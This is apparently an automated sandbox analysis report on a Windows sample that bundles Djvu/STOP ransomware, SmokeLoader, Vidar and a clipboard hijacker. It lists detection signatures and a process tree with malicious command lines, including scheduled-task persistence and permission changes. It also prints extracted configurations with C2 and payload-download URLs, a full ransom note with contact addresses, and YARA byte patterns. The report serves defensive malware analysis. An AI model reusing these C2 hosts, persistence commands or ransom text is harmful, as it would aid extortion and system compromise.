Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1447536
MD5:	a25ac46e5bea920465d1838177782e5b
SHA1:	7abf711cac6ff5f35fc0b3f435d6ec5d9b0a0298
SHA256:	4f367a58544f96f8d0dd19d323acf0db1437d2cd8ef96324a37ea7be20cabf36
Tags:	exe
Infos:

Detection

Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Found ransom note / readme

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected Babuk Ransomware

Yara detected Clipboard Hijacker

Yara detected Djvu Ransomware

Yara detected Powershell download and execute

Yara detected SmokeLoader

Yara detected Vidar

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Found many strings related to Crypto-Wallets (likely being stolen)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies existing user documents (likely ransomware behavior)

Opens network shares

Query firmware table information (likely to detect VMs)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses cmd line tools excessively to alter registry or file data

Uses schtasks.exe or at.exe to add and modify task schedules

Writes a notice file (html or txt) to demand a ransom

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 4304 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A25AC46E5BEA920465D1838177782E5B)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

cmd.exe (PID: 5688 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C002.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 5592 cmdline: reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

E609.exe (PID: 6956 cmdline: C:\Users\user\AppData\Local\Temp\E609.exe MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)

E609.exe (PID: 7048 cmdline: C:\Users\user\AppData\Local\Temp\E609.exe MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)

icacls.exe (PID: 4008 cmdline: icacls "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)

E609.exe (PID: 2844 cmdline: "C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTask MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)

E609.exe (PID: 2764 cmdline: "C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTask MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)

build2.exe (PID: 7144 cmdline: "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe" MD5: 4F54B83888A62CDD3584C0A0FEE970D8)

build2.exe (PID: 5316 cmdline: "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe" MD5: 4F54B83888A62CDD3584C0A0FEE970D8)

cmd.exe (PID: 1340 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIJEBGDAFHI" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

build3.exe (PID: 4284 cmdline: "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe" MD5: 41B883A061C95E9B9CB17D4CA50DE770)

build3.exe (PID: 1820 cmdline: "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe" MD5: 41B883A061C95E9B9CB17D4CA50DE770)

schtasks.exe (PID: 3384 cmdline: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

E609.exe (PID: 5688 cmdline: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)

E609.exe (PID: 5436 cmdline: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)

cmd.exe (PID: 6956 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C01.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 5284 cmdline: reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

E609.exe (PID: 6008 cmdline: "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)

E609.exe (PID: 3128 cmdline: "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)

E609.exe (PID: 916 cmdline: "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)

E609.exe (PID: 4956 cmdline: "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)

WerFault.exe (PID: 7048 cmdline: C:\Windows\system32\WerFault.exe -u -p 2580 -s 10876 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

rujtcgu (PID: 2132 cmdline: C:\Users\user\AppData\Roaming\rujtcgu MD5: A25AC46E5BEA920465D1838177782E5B)

mstsca.exe (PID: 3652 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

mstsca.exe (PID: 3720 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

schtasks.exe (PID: 5356 cmdline: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rujtcgu (PID: 3900 cmdline: C:\Users\user\AppData\Roaming\rujtcgu MD5: A25AC46E5BEA920465D1838177782E5B)

explorer.exe (PID: 6216 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Babuk	Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.	No Attribution	http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/ https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/ https://blog.morphisec.com/babuk-ransomware-variant-major-attack https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/	https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk

Name	Description	Attribution	Blogpost URLs	Link
STOP, Djvu	STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.	No Attribution	https://angle.ankura.com/post/102het9/the-stop-ransomware-variant https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/ https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "4b617f18efba315ca20e874e36c04827", "Version": "9.8"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}

Threatname: Djvu

{"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0871PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA8xYa6j6LzNJB2kuwO9Xc\\\\nSWMnTH6B2dX\\/XX8jCZc7kUlSg50HcwN2bYxLmKAwhfJZPFIYAufx4nMDKTEKIK5\\/\\\\n4RtQWlcufmpr7vcIJMnyyxwwyni9YfRUJR5VIIhfKzQE3gIQZ29b3M6dqzQeQ+oX\\\\nxHUQPadvTz\\/oYY7IbyFLZsHCxHKG2G2v4Yg4SX0nqMuvuzdAT+fLgmZd1ENiuf4U\\\\nWhF6Td3TAs0EkPT6MrxIXCKIQS5LAXEBcAlxRfv4QU03yP7NBxk4\\/gW6l4kV3RuO\\\\nbgqMAuPe3AkrIuOm1zi5FGsr7e8Y8KYE\\/RfQnJe+eOsmXlnhEpJGk1OLIrGxPETz\\\\nUQIDAQAB\\\\n-----END PUBLIC KEY-----"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x27a3:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x249a:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x2527:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x2527:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x284d:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x28d5:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000020.00000002.2341456493.00000000008DC000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x772c:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000010.00000002.2076965546.000000000494A000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001F.00000002.2266884728.00000000049E4000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x624:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x624:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x224:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000E.00000002.2060271846.00000000049DC000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000000.00000002.1710124459.0000000002E20000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000004.00000002.1982585941.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000001A.00000002.2243695606.0000000000BBD000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x7354:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000000.00000002.1710342393.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x7536:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
